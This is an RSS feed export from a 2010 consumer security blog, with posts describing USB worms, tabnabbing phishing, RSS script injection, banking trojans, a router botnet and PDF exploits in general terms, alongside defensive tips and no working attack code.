<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>WordPressSecured.com</title>
	
	<link>http://www.wordpresssecured.com/wpsecurity</link>
	<description />
	<pubDate>Fri, 27 Aug 2010 06:17:00 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.5</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Wordpresssecuredcom" /><feedburner:info uri="wordpresssecuredcom" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>USB Devices - Are You Protected Against Conficker and Stuxnet Worms?</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/fIEjUxz7ldw/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/usb-devices-are-you-protected-against-conficker-and-stuxnet-worms/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 06:17:00 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[flash drive malware]]></category>

		<category><![CDATA[malware worms]]></category>

		<category><![CDATA[Panda Security]]></category>

		<category><![CDATA[PandaLabs]]></category>

		<category><![CDATA[USB devices]]></category>

		<category><![CDATA[USB drive infection]]></category>

		<category><![CDATA[USB drive malware]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=238</guid>
		<description><![CDATA[PandaLabs, which conducts research for Panda Security, attributes a large percentage of malware distribution to the unassuming USB device. It has been estimated that as much as 25% of recently created worms are specifically engineered to spread through the use of USB devices.
Luis Corrons states, &#8220;Much of the malware in circulation has been designed to [...]]]></description>
			<content:encoded><![CDATA[<p>PandaLabs, which conducts research for Panda Security, attributes a large percentage of malware distribution to the unassuming USB device. It has been estimated that as much as 25% of recently created worms are specifically engineered to spread through the use of USB devices.</p>
<p>Luis Corrons states, &#8220;Much of the malware in circulation has been designed to distribute through these devices&#8230; &#8221; In 2008, U.S. military networks were compromised when a USB drive was used to deliver the responsible malware.</p>
<p>According to PandaLabs, the <strong>malware copies itself to the USB</strong>. Then when the device is inserted in any computer the malware code automatically runs and the infection is usually unknown to the user.</p>
<p>Panda conducted a survey in excess of ten thousand small/mid size businesses, and the results were startling. Close to 30% of those businesses were infected with malware in the past year. The culprits were primarily flash drives.</p>
<p>To make matters even worse and more alarming, threats have now spread to cell phones, smartphones, mp3 players, and cameras. You need to consider that all of those devices use some kind of memory either in the form of a memory card or other internal forms. They also all connect to your PC using the versatile USB. Fabulous.</p>
<p>As you may know, the infamous <strong>Conficker worm</strong> received a great deal of attention several years ago as it was spreading through infected flash drives. Then there is the recent hub-bub about the <strong>Stuxnet worm</strong>. Again, it relies heavily on USB drives for proliferation.</p>
<p>Microsoft released a security update in early August to to stick a permanent (we hope) finger in the proverbial dike to address an infectious route used by the Stuxnet worm. How serious is this Stuxnet malware? Well&#8230;</p>
<p>Just this past summer Stuxnet was zeroing in on software used in industrial control systems for utility as well as manufacturing companies. This seems to be a bit more serious than annoying spam emails.</p>
<p>Why would anyone want to target utility companies? What could be gained by major mass infection of manufacturing industries within any particular country?</p>
<p>One of the keys to infection success using the USB port of entry is the ability to autorun. So one obvious measure of protection is to prevent the autorun from happening. And that is what PandaLabs has created as a solution.</p>
<p>They have released <a title="USB Vaccine" href="http://www.pandasecurity.com/homeusers/downloads/usbvaccine/" target="_blank">USB Vaccine</a>, and it is available for free at Panda&#8217;s website.</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=USB%20Devices%20-%20Are%20You%20Protected%20Against%20Conficker%20and%20Stuxnet%20Worms%3F&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fusb-devices-are-you-protected-against-conficker-and-stuxnet-worms%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/usb-devices-are-you-protected-against-conficker-and-stuxnet-worms/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/usb-devices-are-you-protected-against-conficker-and-stuxnet-worms/</feedburner:origLink></item>
		<item>
		<title>Phishing Attacks Target Tabbed Browsers</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/g4CVV7AL_Ns/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/phishing-attacks-target-tabbed-browsers/#comments</comments>
		<pubDate>Fri, 28 May 2010 05:38:05 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[Chrome tab exploit]]></category>

		<category><![CDATA[Mozilla Fire Fox tab exploit]]></category>

		<category><![CDATA[phishing attacks]]></category>

		<category><![CDATA[phishing exploit]]></category>

		<category><![CDATA[tabbed browser exploit]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=227</guid>
		<description><![CDATA[A Mozilla researcher seems to have stumbled upon an entirely new kind of phishing exploit that involves those handy tabs we&#8217;re all becoming used to seeing in different browsers. It&#8217;s a fairly simple design, but it&#8217;s clever and some people are bound to get tapped by it. This attack plays on the method in which [...]]]></description>
			<content:encoded><![CDATA[<p>A Mozilla researcher seems to have stumbled upon an entirely new kind of phishing exploit that involves those handy tabs we&#8217;re all becoming used to seeing in different browsers. It&#8217;s a fairly simple design, but it&#8217;s clever and some people are bound to get tapped by it. This attack plays on the method in which browsers manage and deal with tabs.</p>
<p>The basic concept involves a script that while running in tab number one, for example, it can change the content in tab number two. The main requirement is to have multiple tabs open at the same time which is a pretty common online practice.</p>
<p>The Mozilla representative, Aza Raskin, has demonstrated the tab phish, and he has conjectured that this new method is suited for specific and well-targeted attacks against customers of banks, credit card companies, or even web based email services.</p>
<p>An additional requirement in order to complete the exploit is for the attackers website to have been visited. Of course that site contains the script used in the tab attack exploit. When the infected site is visited, the deviant software works to identify any existing tabs that are open. Then it determines the length of time each tab has been open.</p>
<p>This is important because to have a successful exploit with this method requires sites that have been open for a while. <em>Javascript is then used to change the content to resemble basically anything the attacker wishes.</em></p>
<p>Mr. Raskin has an example on his website in which the new page is actually Gmail&#8217;s login page. <strong>You can watch a video demonstration of the attack here: </strong><a href="http://threatpost.com/en_us/blogs/new-phishing-attack-exploits-tabbed-browsing-052510?utm_source=Personalities+Pod&amp;utm_med  ium=Home+Page+Personalities&amp;utm_campaign=Personalities+Dennis">Video Demonstration Tab Exploit</a></p>
<p>But you can see the potential here. The attacker can make the page look like whatever he wants such as your bank&#8217;s login page, a credit card login page, or even Paypal&#8217;s login page. Of course there is a reliance on the reader&#8217;s memory of visiting that page.</p>
<p>But the important item of note is this attack can involve any site. Javascript must also be enabled for thsi attack to be effective.</p>
<p>As for Firefox, a fix has been implemented for the Noscript addon for this type of attack. But the attack apparently is successful in Google&#8217;s Chrome. The take away from this is to be vigilant when you&#8217;re browsing if you have tabs.</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Phishing%20Attacks%20Target%20Tabbed%20Browsers&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fphishing-attacks-target-tabbed-browsers%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/phishing-attacks-target-tabbed-browsers/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/phishing-attacks-target-tabbed-browsers/</feedburner:origLink></item>
		<item>
		<title>RSS Feed and RSS Reader Security Risks</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/6UqiZwFGuAE/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/rss-feed-and-rss-reader-security-risks/#comments</comments>
		<pubDate>Thu, 13 May 2010 00:20:17 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[RSS aggregator security]]></category>

		<category><![CDATA[RSS exploits]]></category>

		<category><![CDATA[RSS feed security risks]]></category>

		<category><![CDATA[RSS HTML injections]]></category>

		<category><![CDATA[RSS literal injections]]></category>

		<category><![CDATA[RSS malware]]></category>

		<category><![CDATA[RSS reader security risks]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=216</guid>
		<description><![CDATA[Do You Know If That RSS Feed Subscription Is Safe?
In case you don&#8217;t know, RSS stands for Really Simple Syndication and/or Rich Site Summary. It&#8217;s a method for distributing content via an XML format. You can subscribe to RSS feeds from any site that offers them, usually blogs, and then read them using RSS readers [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Do You Know If That RSS Feed Subscription Is Safe?</strong></p>
<p>In case you don&#8217;t know, RSS stands for Really Simple Syndication and/or Rich Site Summary. It&#8217;s a method for distributing content via an XML format. You can subscribe to RSS feeds from any site that offers them, usually blogs, and then read them using RSS readers on your computer. It&#8217;s an efficient and convenient process that many people enjoy.</p>
<p>So let&#8217;s delve a little deeper into RSS&#8230;</p>
<p>As you now know, or probably already knew, there are RSS feeds and RSS readers. The latter are also known as RSS aggregators, or feed readers. And the feeds contain the content you&#8217;re looking for from RSS enabled static sites and blogs. The reader is a software program installed on your home computer.</p>
<p>Now let&#8217;s get to the meat of the matter and discuss some <strong>security vulnerabilities associated with RSS</strong>.</p>
<p><em>There are risks and vulnerabilities with feeds as well as readers.</em> These risks are inherent with the entire process and is too large a subject to cover in a single blog post.</p>
<p><strong>RSS feed vulnerabilities:</strong></p>
<p>The major security issues with feeds involve a variety of scripts that are injected into the feeds and become incorporated into the normal feed elements. Of course this occurs upstream to your computer, and it&#8217;s performed in such a way that it looks like normal feed data.</p>
<p>Some of the <em>exploited RSS elements</em> are: Feed Item links, titles, description XML components; and feed titles. Some Atom feed elements are: Feed title, sub title, author name, and entry updates.</p>
<p><strong>The HTML literal injection exploit:</strong></p>
<p>These involve placement of scripts within literal HTML tag inclusions. In particular cases, when there are HTML tags within a feed, the content is displayed in a literal fashion. When an RSS reader, or aggregator, sees these tags, they&#8217;re executed as literals and the scripts they contain are executed.</p>
<p>An infected feed can include scripts that install malicious software that perform additional executions of pretty much any kind, or they can just steal cookies, for example. It all depends on the degree of harmful intent - and your luck of the draw.</p>
<p><strong>The HTML entity injection exploit:</strong></p>
<p>Basically, these exploits are normally read and executed within HTML entities of the RSS feed. <em>The harmful scripts are executed after they arrive on your computer and are read.</em> There&#8217;s no way of knowing if you&#8217;re reading an infected RSS feed, not right away at least. But still, you won&#8217;t know if the RSS feed caused your problem, or not.</p>
<p>Entity injections bring into play issues with &#8216;local zones&#8217; within your computer. This happens because readers usually store their data within a local directory file, and then you&#8217;ll be left with local zone security vulnerabilities within your PC.</p>
<p>A local zone security problem can arise if the infected file has ActiveX configured to read/write files to your hard disk. Then that file can be read and sent to anywhere the hacker specified it to be sent on the net. <strong>That is how critical and personal data and information can be stolen from your computer</strong>.</p>
<p>The disheartening news about all this is that it&#8217;s extremely difficult to use RSS feeds in a safe manner. You can use a reader that removes HTML entities and any meta characters before displaying the feed. Also, you can use a feed reader that strips various tags such as: object, frameset, script, embed, link, meta, etc.</p>
<p>Proceed with caution&#8230;</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=RSS%20Feed%20and%20RSS%20Reader%20Security%20Risks&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Frss-feed-and-rss-reader-security-risks%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/rss-feed-and-rss-reader-security-risks/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/rss-feed-and-rss-reader-security-risks/</feedburner:origLink></item>
		<item>
		<title>Online Banking Security Threats For 2010</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/rAh2eYaU6eY/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/online-banking-security-threats-for-2010/#comments</comments>
		<pubDate>Wed, 12 May 2010 05:18:42 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[banking trojans]]></category>

		<category><![CDATA[Internet Crime Complaint Center]]></category>

		<category><![CDATA[online banking hackers]]></category>

		<category><![CDATA[online banking security]]></category>

		<category><![CDATA[online banking threats]]></category>

		<category><![CDATA[protecting your online banking]]></category>

		<category><![CDATA[secure online banking transactions]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=206</guid>
		<description><![CDATA[Online Banking Is Secure, So It&#8217;s Safe. Right? 
Your bank offers secure online banking, so why should you worry&#8230;
Most people see the ads for &#8220;Secure Online Banking&#8221; and think it&#8217;s safe to use, and there won&#8217;t ever be a problem. After all, banks can afford the best resources money can buy. A reasonable assumption about [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Online Banking Is Secure, So It&#8217;s Safe. Right? </strong></p>
<p>Your bank offers secure online banking, so why should you worry&#8230;</p>
<p>Most people see the ads for &#8220;Secure Online Banking&#8221; and think it&#8217;s safe to use, and there won&#8217;t ever be a problem. After all, banks can afford the best resources money can buy. A reasonable assumption about a bank.</p>
<p>But you may be alarmed at this statistic&#8230;</p>
<p>In 2009, Americans lost approximately <em>$559 million</em> to various forms of online theft from bank accounts. That figure is according to the Internet Crime Complaint Center. The 2009 amount is more than double the amount for 2008 in which &#8216;only&#8217; $268 million was stolen via the net.</p>
<p>Sean Sullivan, a security adviser with F-Secure - an internet security firm, made the following comment: &#8220;Last year there were more online bank robberies than there were actual on-site bank robberies. Banks have become very proactive in protecting accounts from hackers, but it&#8217;s still quite a large problem. We see all types of new attempts every day.&#8221;</p>
<p>Hackers are designing trojans specifically targeted toward banks, and <em>these trojans constitute the largest threat to online banking customers</em>. According to Sullivan, &#8220;Some more advanced types of trojans can make fraudulent transfers and drain your account <strong>while you are logged on</strong> to the account online.&#8221;</p>
<p>But how can you tell if your bank is safe, or at least reasonably well-protected?</p>
<p>The way you can tell doesn&#8217;t offer much of a warm fuzzy, and it even seems a bit of a crude indicator. But here goes&#8230;</p>
<p>The more aggravation you encounter when you log into your online bank account, the more secure it is. <em>What?</em> If your online bank website makes you jump through many hoops in the form of questions, and wants you to input multiple passwords, which mine does not, then that means the level of security is higher.</p>
<p>We hope you feel better now.</p>
<p>Sullivan offers this, &#8220;The more layers you have before you get to your account, the safer you are.&#8221;</p>
<p><strong>What you can do to protect your bank account:</strong></p>
<ul>
<li>Make sure you&#8217;re home PC has the suite of security apps including firewall, anti-spyware, anti-virus, and any other security software. Plus - <em>keep it all updated and current.</em></li>
</ul>
<ul>
<li>Never access your online bank account, or any financial-related account, from a shared computer.</li>
</ul>
<ul>
<li>Always report anything suspicious on your bank account, and perform a regular review of your statement.</li>
</ul>
<ul>
<li><em>Be sure to use the strongest password possible</em>. Use all the available spaces your bank will let you and include numbers, odd spellings, upper and lower case.</li>
</ul>
<ul>
<li>For wireless connections, you brave soul, make sure your connections are encrypted. Never use a public network such as in public places.</li>
</ul>
<ul>
<li>If you have a LAN set-up at home, see the previous post about network hacks. <strong>Change your router password ASAP.</strong></li>
</ul>
<ul>
<li>Be sure to log-out, fully, after every online banking session.</li>
</ul>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Online%20Banking%20Security%20Threats%20For%202010&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fonline-banking-security-threats-for-2010%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/online-banking-security-threats-for-2010/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/online-banking-security-threats-for-2010/</feedburner:origLink></item>
		<item>
		<title>Desktop Security War Lost - The New Battle For Your Home Network</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/6bRjKlFDD6A/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/desktop-security-war-lost-the-new-battle-for-your-home-network/#comments</comments>
		<pubDate>Sat, 08 May 2010 06:03:11 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[botnet threats]]></category>

		<category><![CDATA[Chuck Norris botnet]]></category>

		<category><![CDATA[desktop security]]></category>

		<category><![CDATA[DSL modem security]]></category>

		<category><![CDATA[home network security]]></category>

		<category><![CDATA[infected home computer networks]]></category>

		<category><![CDATA[network botnets]]></category>

		<category><![CDATA[network malware]]></category>

		<category><![CDATA[router security]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=196</guid>
		<description><![CDATA[Desktop Security War Is Lost While The Home Network Security War Heats Up
Desktop security is a subject that sometimes seems to take a back seat to the usual news about website, blog, and server hacking. But it&#8217;s a well worn topic for big financial business and security experts and analysts. And for very good reason.
This [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Desktop Security War Is Lost While The Home Network Security War Heats Up</strong></p>
<p>Desktop security is a subject that sometimes seems to take a back seat to the usual news about website, blog, and server hacking. But it&#8217;s a well worn topic for big financial business and security experts and analysts. And for very good reason.</p>
<p>This past week Jeremiah Grossman, CTO of WhiteHat Security, wrote that many organizations within the financial services industry are at the point now where the operating assumption is that customer desktop&#8217;s are compromised.</p>
<p><em>That is the basic assumption.</em></p>
<p>Related to that ugly and depressing scenario is the nearby battle waging over the security of home networks. Nefarious botnets are being unleashed on home routers and DSL modems.</p>
<p>What that means is even if your PC has been pronounced squeaky clean, you need not surf another infected site, or receive another piece of malware laden spam to still lose control over your home system. From the DNS, routers, and modems you&#8217;re wide open and fair game.</p>
<p><strong>What&#8217;s worse, at this moment there are few defensive security measures in place to protect your home networks - or to even detect if they have become compromised</strong>.</p>
<p>Enter Chuck Norris , the botnet.</p>
<p>This botnet was first discovered, and named, by Czech researchers. The method of unwanted entry is attacking <em>poorly configured</em> DSL modems and routers. One thing you can do, and it&#8217;s not a lot and may be too late, is to <strong>change the default password on your home router</strong>.</p>
<p>The Chuck Norris botnet only targets vulnerable routers and DSL modems. It will guess default admin passwords, and the situation is inadvertantly encouraged because many of these devices are configured for remote access.</p>
<p>After doing the preliminary guesswork, the botnet will install itself.</p>
<p>The network botnet mission is to gain control of outbound internet traffic which can be used for a number of purposes. This is a very effective strategy for hackers and allows for control over large numbers of systems while eliminating the need for constant intrusion and reinfection.</p>
<p>Little is actually widely known about how to fix compromised network devices. The final shot to the gut is that <strong>cable companies and ISP&#8217;s</strong> basically don&#8217;t care about your home network maladies.</p>
<p><em>That&#8217;s your territory, and your problem.</em></p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Desktop%20Security%20War%20Lost%20-%20The%20New%20Battle%20For%20Your%20Home%20Network&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fdesktop-security-war-lost-the-new-battle-for-your-home-network%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/desktop-security-war-lost-the-new-battle-for-your-home-network/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/desktop-security-war-lost-the-new-battle-for-your-home-network/</feedburner:origLink></item>
		<item>
		<title>Social Media Security Threats And Your Business</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/wfWyhFKrVYg/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/social-media-security-threats-and-your-business/#comments</comments>
		<pubDate>Wed, 05 May 2010 01:20:19 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[expanded urls]]></category>

		<category><![CDATA[Facebook security]]></category>

		<category><![CDATA[malware risk awareness]]></category>

		<category><![CDATA[online business security]]></category>

		<category><![CDATA[shortened urls]]></category>

		<category><![CDATA[social media security]]></category>

		<category><![CDATA[social media threats]]></category>

		<category><![CDATA[Twitter security]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=186</guid>
		<description><![CDATA[Why You Need To Take Social Media Security Threats Seriously In Your Business
Security and social media sites are a combination that presents unique challenges for individuals as well as businesses. The real-time environment and communications are only part of the attraction. As you can imagine, this real-time aspect also provides unique, powerful, and dangerous opportunities [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Why You Need To Take Social Media Security Threats Seriously In Your Business</strong></p>
<p>Security and social media sites are a combination that presents unique challenges for individuals as well as businesses. The real-time environment and communications are only part of the attraction. As you can imagine, this real-time aspect also provides unique, powerful, and dangerous opportunities for those who would do you, or your business, harm.</p>
<p>Just a few well-known risks involve Facebook images with worms, and the uncertainty of what&#8217;s behind all those shortened URLs on Twitter. Also, many social media resources and tools are hosted on third party websites which makes it even more difficult to know their levels of security or trustworthiness.</p>
<p>Here are some interesting numbers regarding security and social media sites:</p>
<ul>
<li>According to the Sophos Security Threat Report (Jan 2010), for 2009 there was a 70% increase in the proportion of businesses reporting spam and malware attacks originating from social network websites. Over one third of these businesses reported receiving malware attacks from social media sites.</li>
</ul>
<ul>
<li>Also, more than 72% of these firms feel employee behavior on social media sites pose dangers to the security of their businesses.</li>
</ul>
<ul>
<li>According to SC Magazine, respondents to their studies consider Facebook to be the biggest threat to security, then followed by MySpace and Twitter.</li>
</ul>
<p>There are a number of measures companies, and individuals, can put into place to protect their assets, and that includes both in and out of the firewall. <em>But the one strategic action everyone should take is to become aware of the risks involved with social media sites</em>.</p>
<p><strong>Risk awareness</strong> is critical because you will not take any protection measures if you&#8217;re not aware of potential threats.</p>
<p><strong>Threat mitigation</strong> is another recommended and desired strategic action. Putting these safeguards into place, after the fact, can be a very painful lesson learned.</p>
<p><em>Here are additional tips and resources to decrease social media security threats:</em></p>
<p>You are an integral mitigating force in the overall arsenal. So, remember to &#8220;Think before you click.&#8221; Obviously that is not total protection. But have you ever been rushed, or maybe even excited to check something out, and you clicked on a link almost automatically? Have you ever done that and had something unpleasant happen? Well, that happens all the time all over the world.</p>
<p>So just try to remember to <em>think before you click</em>.</p>
<p><strong>Shortened links</strong> - They&#8217;re great for saving space in the Twitter micro-blogging world. You&#8217;ve seen them, most likely: tinyurl, Bit.ly, or is.gd. But the obvious risk they pose is hiding the destination URL. What you need is a scanner to check shortened links such as:</p>
<p><strong>Disclaimer: No tool is 100% perfect.</strong></p>
<p><a href=" http://longurl.org">http://longurl.org/</a></p>
<p><a href="http://prevurl.com/">http://prevurl.com/</a></p>
<p><strong>Expanded links</strong> - Expanded links are of the kind that reveal the website domain. For example, www.wordpresssecured.com/wpsecurity can be called an expanded link. But still, you could be unaware of what exactly is on the page behind the link. There could be a malware threat, virus, or other threat waiting for you. So to counter that, you can use an expanded link scanning tool:</p>
<p><strong>Disclaimer: No tool is 100% perfect.</strong></p>
<p><a href="http://searchengineland.com/googles-safe-browsing-diagnostic-tool-14064">http://searchengineland.com/googles-safe-browsing-diagnostic-tool-14064</a></p>
<p><a href="http://linkscanner.explabs.com/linkscanner/default.aspx">http://linkscanner.explabs.com/linkscanner/default.aspx</a></p>
<p><a href="https://safeweb.norton.com/"></a></p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Social%20Media%20Security%20Threats%20And%20Your%20Business&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fsocial-media-security-threats-and-your-business%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/social-media-security-threats-and-your-business/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/social-media-security-threats-and-your-business/</feedburner:origLink></item>
		<item>
		<title>PDF Exploits - A Hot Trend That’s Getting Worse</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/Bh-xqizjYnA/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/pdf-exploits-a-hot-trend-thats-getting-worse/#comments</comments>
		<pubDate>Sat, 01 May 2010 21:43:32 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[Adobe Acrobat pdf malware]]></category>

		<category><![CDATA[Adobe Reader exploits]]></category>

		<category><![CDATA[data stealing]]></category>

		<category><![CDATA[executable pdf malware]]></category>

		<category><![CDATA[McAfee security]]></category>

		<category><![CDATA[pdf attachments in spam]]></category>

		<category><![CDATA[pdf exploits]]></category>

		<category><![CDATA[spam attachments]]></category>

		<category><![CDATA[Zeus malware]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=179</guid>
		<description><![CDATA[PDF Exploits - What You Don&#8217;t Know Can Hurt You
In a previous post, I referenced Semantec&#8217;s Internet Security Report 2010 finding that PDF exploits were sharply on the rise in 2009. Recenly, there have been alarming reports of new PDF exploits that are of a particularly malicious nature. What is also noteworthy is they contain [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>PDF Exploits - What You Don&#8217;t Know Can Hurt You</strong></p>
<p>In a previous post, I referenced Semantec&#8217;s Internet Security Report 2010 finding that PDF exploits were sharply on the rise in 2009. Recenly, there have been alarming reports of new PDF exploits that are of a particularly malicious nature. What is also noteworthy is they contain new techniques and strategies to accomplish their tasks.</p>
<ul>
<li>Security research at McAfee reports that these exploits are continuing to increase in 2010.</li>
</ul>
<ul>
<li>Additionally, according to McAfee labs, only 2% of all malware took advantage of Adobe Reader/Acrobat in 2007 and 2008. In 2009, that figure increased to 17% and 28% in the first quarter of 2010.</li>
</ul>
<ul>
<li>Microsoft has stated that 46% of browser exploits, in the latter half of 2009, were directed toward Adobe&#8217;s free PDF viewer.</li>
</ul>
<p>A PDF was identified by TrendLabs Malware blog which contained exploits for two previous security loophole patches. This is a continuing trend with hackers and programmers on the dark side. They work to exploit existing weaknesses in any application or entrance vehicle.</p>
<p>First though, current Adobe software provides protection against this particular exploit.</p>
<p>The nature of this PDF exploit involves an embedded XML file which contains a virulent TIFF file. This file then downloads existing malware off the net and executes it.</p>
<p>There&#8217;s a yet separate PDF exploit that uses the &#8216;/Launch&#8217; capability and when the PDF is run and confirmed, it executes a malicious embedded file. The PDF itself uses a variance of the &#8216;Launch&#8217; command, and while a dialog box is opened either choice that is made results in malicious activity.</p>
<p>M86 Security Labs recently reported an infected PDF also taking advantage of the &#8220;Launch&#8221; feature. But in that case the installed malware was identified as the data-stealing bot, Zeus which has not been observed in this type of PDF exploit.</p>
<p><strong>So far, Adobe has yet to respond with a fix for this situation.</strong></p>
<p>The &#8220;launch&#8221; PDF exploit has been seen in spam message attachments. So, as you should know, it is never advisable to open attachments from unknown senders. If you have any suspicions at all, the conservative action is to always avoid opening any attachment from unknown senders.</p>
<p>It&#8217;s also <em>very highly recommended to maintain current software for all security related applications, and especially Adobe&#8217;s software if you use it.</em></p>
